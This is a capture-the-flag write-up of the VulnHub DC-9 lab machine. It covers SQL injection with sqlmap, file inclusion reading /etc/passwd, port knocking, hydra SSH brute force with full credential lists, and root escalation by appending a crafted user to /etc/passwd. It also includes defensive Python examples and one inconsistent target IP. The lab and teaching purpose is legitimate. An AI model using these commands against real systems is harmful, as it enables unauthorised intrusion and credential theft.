【vulnhub】DC9
2022-07-18 11:34:00 【Happy star】
Blog home page: Happy star's blog home page
Series column: vulnhub
Start time: 15 July 2022
The author's level is very limited; if you find an error, please let me know, thank you!
The target machine is in bridged mode, so set kali to bridged mode as well.
Host discovery: arp-scan -l
Port scan: nmap -p- -sV 192.168.1.104
Port 80 is open and port 22 is filtered (a filtered state means nmap's probes never reach the port, so it cannot tell whether the port is open; a firewall dropping the packets is the usual cause).
Visit port 80.
User information page

Search page

Back-end management interface
The search page says we can search by last name or first name, so we try it with the first user from the user information page.
Search for Mary.
Test for injection: Mary' and 1=1# returns the record, while Mary' and 1=2# returns nothing.
So there is a SQL injection vulnerability.
Because the parameter is sent via POST, we can capture the request with Burp Suite, save it as 1.txt, and then pass it to sqlmap with the -r option.
Here is another way.
Use the browser's built-in packet capture (developer tools): the parameter name is search, and it is posted to results.php.
Then sqlmap's --data option can be used.
Enumerate the databases:
sqlmap -u "http://192.168.1.104/results.php" --dbs --data "search=1" --batch
List the tables in the users database:
sqlmap -u "http://192.168.1.104/results.php" -D users --tables --data "search=1" --batch
List the columns of UserDetails:
sqlmap -u "http://192.168.1.104/results.php" -D users -T UserDetails --columns --data "search=1" --batch
Dump the data:
sqlmap -u "http://192.168.1.104/results.php" -D users -T UserDetails -C "id,username,password" --dump --data "search=1" --batch
We get the passwords of a number of user accounts; they appear to be stored in plaintext.
List the tables in the Staff database:
sqlmap -u "http://192.168.1.104/results.php" -D Staff --tables --data "search=1" --batch
List the columns of StaffDetails:
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T StaffDetails --columns --data "search=1" --batch
Dump StaffDetails:
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T StaffDetails -C "id,username,password" --dump --data "search=1" --batch
Look at the Users table. List its columns:
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T Users --columns --data "search=1" --batch
Dump it:
sqlmap -u "http://192.168.1.104/results.php" -D Staff -T Users -C "Username,Password" --dump --data "search=1" --batch
The admin user:


The password is transorbital1.
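The boolean test above (Mary' and 1=1# versus Mary' and 1=2#) only works because the search term is spliced into the SQL text. The following is an added example, not the box's own results.php: the same search written the vulnerable way and with a bound parameter, on a constructed in-memory SQLite table, using SQLite's "-- " comment where the page's MySQL payloads use "#"; the column names and rows are assumptions.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the users.UserDetails table; rows are invented.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE UserDetails (id INTEGER, firstname TEXT, "
                "lastname TEXT, username TEXT)")
    con.executemany("INSERT INTO UserDetails VALUES (?, ?, ?, ?)",
                    [(1, "Mary", "Moe", "marym"), (2, "Julie", "Dooley", "julied")])
    return con

def search_vulnerable(con: sqlite3.Connection, term: str) -> list:
    # Like the page's results.php: the term is pasted into the SQL text, so a
    # quote in it ends the string literal and whatever follows runs as SQL.
    sql = ("SELECT username FROM UserDetails WHERE firstname = '%s' "
           "OR lastname = '%s'" % (term, term))
    return [row[0] for row in con.execute(sql)]

def search_fixed(con: sqlite3.Connection, term: str) -> list:
    # Parameterised query: the term is bound as data and cannot change the
    # statement, so quotes and comment markers are just characters to match.
    sql = "SELECT username FROM UserDetails WHERE firstname = ? OR lastname = ?"
    return [row[0] for row in con.execute(sql, (term, term))]

def compare(term: str) -> tuple:
    # Run one term through both versions; returns (vulnerable, fixed).
    con = make_db()
    return search_vulnerable(con, term), search_fixed(con, term)

if __name__ == "__main__":
    # The page's boolean check: the vulnerable query answers true/false, the
    # fixed one finds nobody literally named "Mary' and 1=1-- ".
    for term in ("Mary", "Mary' and 1=1-- ", "Mary' and 1=2-- "):
        print(repr(term), compare(term))
```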

Log in to the back end.
The page displays "File does not exist", so there may be a file inclusion vulnerability: http://192.168.1.104/manage.php?file=../../../../etc/passwd
Looking at these user names, we already obtained them when we dumped the database.
So consider ssh.
However, the ssh port's state is filtered, so it may be blocked by a firewall. Read the knockd configuration: http://192.168.1.104/manage.php?file=../../../../etc/knockd.conf
View the configuration file.

The configuration in /etc/knockd.conf is what causes the ssh connection to be refused: knockd dynamically adds iptables rules to hide services the system has opened.
A client "knocks" by connecting to a custom sequence of ports; on seeing the right sequence, the system opens the service port so it can be accessed. When the service is not in use, another custom sequence "closes" it again, so the port is no longer reachable from outside. This further improves the security of the service and the system.
Connect to ports 7469, 8475 and 9842 in that order:
nmap -p 7469 192.168.1.104
nmap -p 8475 192.168.1.104
nmap -p 9842 192.168.1.104
nmap -p 22 10.10.10.135

Port 22 is now open.
Use the accounts and passwords we obtained to brute-force ssh with hydra. users.txt:
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
pass.txt:
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
hydra -L users.txt -P pass.txt 192.168.1.104 ssh
Three users are found:
[22][ssh] host: 192.168.1.104 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.104 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.1.104 login: janitor password: Ilovepeepee
Log in as each of the three users in turn and collect information: ssh [email protected] ssh [email protected]
In janitor's home directory we find a password dictionary; add it to our password dictionary and keep brute-forcing the ssh service.

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Update pass.txt.
Run hydra again.

One more user:
login: fredf password: B4-Tru3-001
Log in directly.
Privilege escalation: sudo -l
There is one entry, test, which requires no password.
Enter the test directory and try to run it.
The usage prompt mentions test.py.
In the directory /opt/devstuff we find test.py.

It writes the contents of the first file into the second file.
So we can rewrite /etc/passwd and add a root user.
Use openssl to generate a password hash: openssl passwd -1 -salt coder 123456
$1$coder$FFj87UJt/aBpDjcIMTCtR1
echo 'coder:$1$coder$FFj87UJt/aBpDjcIMTCtR1:0:0:root:/bin/bash' >> /tmp/DC9
sudo python ./test.py /tmp/DC9 /etc/passwd
su coder
The flag is in root's home directory.
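The file inclusion in manage.php and the sudo-runnable test.py share one root cause: a path supplied by the user is opened without checking where it resolves. As an added example (not the box's own code; the base directory, the function names and the assumption that test.py appends the first file to the second are mine), here is one confinement check used for both a read and an append:

```python
import os
from typing import Optional

def confine(base: str, user_path: str) -> Optional[str]:
    # Resolve the requested path and accept it only if it is still under base.
    # realpath collapses '..' and follows symlinks, so ../../../../etc/passwd
    # and a symlink inside base pointing at /etc/passwd are both rejected; the
    # trailing separator stops /opt/devstuff-x from passing as /opt/devstuff.
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_path))
    if target == base_real or target.startswith(base_real + os.sep):
        return target
    return None

def read_page(base: str, name: str) -> Optional[bytes]:
    # Safe counterpart of manage.php?file=...: only files under base are served.
    path = confine(base, name)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as f:
        return f.read()

def copy_file(base: str, src: str, dst: str) -> bool:
    # Safe counterpart of the page's test.py (assumed: append first file to the
    # second). A sudo NOPASSWD rule on an unchecked copy lets any caller append
    # to /etc/passwd, so here both paths must resolve inside base.
    src_path, dst_path = confine(base, src), confine(base, dst)
    if src_path is None or dst_path is None:
        return False
    with open(src_path, "rb") as fin, open(dst_path, "ab") as fout:
        fout.write(fin.read())
    return True

def demo() -> dict:
    # Constructed sandbox in a temporary directory exercising both checks.
    import tempfile
    with tempfile.TemporaryDirectory() as base:
        os.mkdir(os.path.join(base, "dist"))
        with open(os.path.join(base, "dist", "in.txt"), "w") as f:
            f.write("hello\n")
        return {
            "read_inside": read_page(base, "dist/in.txt") == b"hello\n",
            "read_traversal": read_page(base, "../../../../etc/passwd"),
            "copy_inside": copy_file(base, "dist/in.txt", "dist/out.txt"),
            "copy_to_passwd": copy_file(base, "dist/in.txt", "../../../../etc/passwd"),
        }

if __name__ == "__main__":
    print(demo())
```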